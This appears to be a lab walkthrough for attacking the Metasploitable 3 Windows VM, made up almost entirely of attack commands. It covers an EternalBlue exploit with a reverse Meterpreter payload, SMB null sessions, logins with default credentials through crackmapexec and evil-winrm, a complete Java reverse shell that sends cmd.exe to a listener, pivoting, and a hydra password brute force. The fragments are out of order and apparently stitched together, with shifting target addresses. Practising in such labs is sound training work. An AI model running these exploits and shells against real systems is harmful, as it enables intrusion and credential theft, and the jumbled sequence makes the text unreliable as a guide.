Metasploitable 3 Windows Walkthrough (2026)
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.56.102
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.56.101
msf6 > exploit
Success: you now have a SYSTEM-level Meterpreter session. Game over. If the exploit crashes the target (a known issue), switch to ms17_010_psexec.
If you have domain credentials (Metasploitable 3 has vagrant/vagrant and administrator/vagrant):
crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"
Or use evil-winrm for an interactive shell:
evil-winrm -i 192.168.56.103 -u administrator -p vagrant
Before we type a single exploit, we need the environment stable.
enum4linux -a 192.168.56.105
smbclient -L //192.168.56.105 -N # null session
Mount share:
mount -t cifs //192.168.56.105/ADMIN$ /mnt/target -o username=vagrant,password=vagrant
String host="192.168.56.10";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(), so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0) so.write(pi.read());
while(pe.available()>0) so.write(pe.read());
while(si.available()>0) po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try { p.exitValue(); break; } catch (Exception e) {}
};
p.destroy();
s.close();
On the Kali listener:
nc -lvnp 4444
run autoroute -s 192.168.1.0/24
background
Your initial foothold might be NETWORK SERVICE or a low-priv user. Time to escalate.
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb
The password is often vagrant or mcpassword123 (check the Vagrant build files).
